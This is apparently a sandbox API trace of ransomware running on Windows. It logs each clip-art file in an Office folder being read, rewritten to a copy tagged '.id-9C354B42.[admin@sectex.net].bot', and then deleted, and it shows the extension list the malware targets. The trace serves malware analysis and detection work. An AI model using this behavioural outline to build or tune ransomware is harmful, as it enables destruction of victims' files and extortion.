	[0151.943] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0151.943] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0151.943] SetEndOfFile (hFile=0x38c) returned 1
	[0151.943] CloseHandle (hObject=0x38c) returned 1
	[0151.943] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.943] SetEndOfFile (hFile=0x3b0) returned 1
	[0151.945] CloseHandle (hObject=0x3b0) returned 1
	[0151.945] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.433] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg")) returned 1
	[0152.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63
	[0152.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63
	[0152.437] lstrlenW (lpString=".doc") returned 4
	[0152.437] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.437] lstrlenW (lpString=".docx") returned 5
	[0152.437] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1
	[0152.437] lstrlenW (lpString=".pdf") returned 4
	[0152.437] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.437] lstrlenW (lpString=".xls") returned 4
	[0152.437] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.437] lstrlenW (lpString=".xlsx") returned 5
	[0152.437] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1
	[0152.437] lstrlenW (lpString=".ppt") returned 4
	[0152.437] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63
	[0152.437] lstrlenW (lpString=".zip") returned 4
	[0152.437] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.437] lstrlenW (lpString=".rar") returned 4
	[0152.437] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.438] lstrlenW (lpString=".bz2") returned 4
	[0152.438] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.438] lstrlenW (lpString=".7z") returned 3
	[0152.438] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63
	[0152.438] lstrlenW (lpString=".dbf") returned 4
	[0152.438] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63
	[0152.438] lstrlenW (lpString=".1cd") returned 4
	[0152.438] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63
	[0152.438] lstrlenW (lpString=".jpg") returned 4
	[0152.438] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63
	[0152.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63
	[0152.438] lstrlenW (lpString=".doc") returned 4
	[0152.438] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.438] lstrlenW (lpString=".docx") returned 5
	[0152.438] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1
	[0152.438] lstrlenW (lpString=".pdf") returned 4
	[0152.438] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.438] lstrlenW (lpString=".xls") returned 4
	[0152.438] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.438] lstrlenW (lpString=".xlsx") returned 5
	[0152.438] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1
	[0152.438] lstrlenW (lpString=".ppt") returned 4
	[0152.438] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63
	[0152.438] lstrlenW (lpString=".zip") returned 4
	[0152.438] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.439] lstrlenW (lpString=".rar") returned 4
	[0152.439] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.439] lstrlenW (lpString=".bz2") returned 4
	[0152.439] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.439] lstrlenW (lpString=".7z") returned 3
	[0152.439] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63
	[0152.439] lstrlenW (lpString=".dbf") returned 4
	[0152.439] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63
	[0152.439] lstrlenW (lpString=".1cd") returned 4
	[0152.439] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 63
	[0152.439] lstrlenW (lpString=".jpg") returned 4
	[0152.439] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.439] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0152.439] lstrlenW (lpString="J0099161.JPG") returned 12
	[0152.439] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099161.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0152.440] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=7154) returned 1
	[0152.440] CloseHandle (hObject=0x3c8) returned 1
	[0152.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099161.jpg")) returned 0x20
	[0152.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099161.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099161.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0152.440] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.440] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099161.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0152.441] GetLastError () returned 0x0
	[0152.441] ReadFile (in: hFile=0x3c8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1bf2, lpOverlapped=0x0) returned 1
	[0152.464] WriteFile (in: hFile=0x3b0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1c00, lpOverlapped=0x0) returned 1
	[0152.465] ReadFile (in: hFile=0x3c8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.465] WriteFile (in: hFile=0x3b0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.465] SetEndOfFile (hFile=0x3b0) returned 1
	[0152.465] CloseHandle (hObject=0x3b0) returned 1
	[0152.465] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.465] SetEndOfFile (hFile=0x3c8) returned 1
	[0152.467] CloseHandle (hObject=0x3c8) returned 1
	[0152.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.468] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099161.jpg")) returned 1
	[0152.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63
	[0152.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63
	[0152.468] lstrlenW (lpString=".doc") returned 4
	[0152.468] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.468] lstrlenW (lpString=".docx") returned 5
	[0152.469] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1
	[0152.469] lstrlenW (lpString=".pdf") returned 4
	[0152.469] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.469] lstrlenW (lpString=".xls") returned 4
	[0152.469] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.469] lstrlenW (lpString=".xlsx") returned 5
	[0152.469] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1
	[0152.469] lstrlenW (lpString=".ppt") returned 4
	[0152.469] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63
	[0152.469] lstrlenW (lpString=".zip") returned 4
	[0152.469] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.469] lstrlenW (lpString=".rar") returned 4
	[0152.469] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.469] lstrlenW (lpString=".bz2") returned 4
	[0152.469] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.469] lstrlenW (lpString=".7z") returned 3
	[0152.469] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63
	[0152.469] lstrlenW (lpString=".dbf") returned 4
	[0152.469] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63
	[0152.469] lstrlenW (lpString=".1cd") returned 4
	[0152.469] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63
	[0152.469] lstrlenW (lpString=".jpg") returned 4
	[0152.469] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63
	[0152.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63
	[0152.469] lstrlenW (lpString=".doc") returned 4
	[0152.469] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.470] lstrlenW (lpString=".docx") returned 5
	[0152.470] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1
	[0152.470] lstrlenW (lpString=".pdf") returned 4
	[0152.470] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.470] lstrlenW (lpString=".xls") returned 4
	[0152.470] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.470] lstrlenW (lpString=".xlsx") returned 5
	[0152.470] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1
	[0152.470] lstrlenW (lpString=".ppt") returned 4
	[0152.470] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63
	[0152.470] lstrlenW (lpString=".zip") returned 4
	[0152.470] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.470] lstrlenW (lpString=".rar") returned 4
	[0152.470] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.470] lstrlenW (lpString=".bz2") returned 4
	[0152.470] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.470] lstrlenW (lpString=".7z") returned 3
	[0152.470] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63
	[0152.470] lstrlenW (lpString=".dbf") returned 4
	[0152.470] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63
	[0152.470] lstrlenW (lpString=".1cd") returned 4
	[0152.470] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63
	[0152.470] lstrlenW (lpString=".jpg") returned 4
	[0152.470] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.470] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0152.471] lstrlenW (lpString="J0099164.WMF") returned 12
	[0152.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099164.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc
	[0152.494] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=21946) returned 1
	[0152.494] CloseHandle (hObject=0x3fc) returned 1
	[0152.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099164.wmf")) returned 0x20
	[0152.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099164.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099164.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0152.576] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.576] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099164.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0152.577] GetLastError () returned 0x0
	[0152.577] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x55ba, lpOverlapped=0x0) returned 1
	[0152.608] WriteFile (in: hFile=0x3dc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x55c0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x55c0, lpOverlapped=0x0) returned 1
	[0152.610] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.610] WriteFile (in: hFile=0x3dc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.610] SetEndOfFile (hFile=0x3dc) returned 1
	[0152.610] CloseHandle (hObject=0x3dc) returned 1
	[0152.610] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.610] SetEndOfFile (hFile=0x3b0) returned 1
	[0152.614] CloseHandle (hObject=0x3b0) returned 1
	[0152.614] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.633] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099164.wmf")) returned 1
	[0152.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 63
	[0152.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 63
	[0152.634] lstrlenW (lpString=".doc") returned 4
	[0152.634] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.634] lstrlenW (lpString=".docx") returned 5
	[0152.634] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0152.634] lstrlenW (lpString=".pdf") returned 4
	[0152.634] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.634] lstrlenW (lpString=".xls") returned 4
	[0152.634] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.634] lstrlenW (lpString=".xlsx") returned 5
	[0152.634] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0152.634] lstrlenW (lpString=".ppt") returned 4
	[0152.634] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 63
	[0152.634] lstrlenW (lpString=".zip") returned 4
	[0152.634] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.634] lstrlenW (lpString=".rar") returned 4
	[0152.634] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.634] lstrlenW (lpString=".bz2") returned 4
	[0152.634] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.634] lstrlenW (lpString=".7z") returned 3
	[0152.634] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 63
	[0152.634] lstrlenW (lpString=".dbf") returned 4
	[0152.634] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 63
	[0152.634] lstrlenW (lpString=".1cd") returned 4
	[0152.634] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 63
	[0152.634] lstrlenW (lpString=".jpg") returned 4
	[0152.635] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 63
	[0152.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 63
	[0152.635] lstrlenW (lpString=".doc") returned 4
	[0152.635] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.635] lstrlenW (lpString=".docx") returned 5
	[0152.635] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0152.635] lstrlenW (lpString=".pdf") returned 4
	[0152.635] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.635] lstrlenW (lpString=".xls") returned 4
	[0152.635] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.635] lstrlenW (lpString=".xlsx") returned 5
	[0152.635] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0152.635] lstrlenW (lpString=".ppt") returned 4
	[0152.635] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 63
	[0152.635] lstrlenW (lpString=".zip") returned 4
	[0152.635] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.635] lstrlenW (lpString=".rar") returned 4
	[0152.635] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.635] lstrlenW (lpString=".bz2") returned 4
	[0152.635] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.635] lstrlenW (lpString=".7z") returned 3
	[0152.635] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 63
	[0152.635] lstrlenW (lpString=".dbf") returned 4
	[0152.635] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 63
	[0152.635] lstrlenW (lpString=".1cd") returned 4
	[0152.635] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned 63
	[0152.636] lstrlenW (lpString=".jpg") returned 4
	[0152.636] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.636] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0152.636] lstrlenW (lpString="J0099175.WMF") returned 12
	[0152.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099175.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0152.642] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=9744) returned 1
	[0152.642] CloseHandle (hObject=0x3ac) returned 1
	[0152.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099175.wmf")) returned 0x20
	[0152.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099175.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099175.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0152.665] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.665] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099175.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099175.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0152.666] GetLastError () returned 0x0
	[0152.666] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2610, lpOverlapped=0x0) returned 1
	[0153.122] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2620, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2620, lpOverlapped=0x0) returned 1
	[0153.123] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
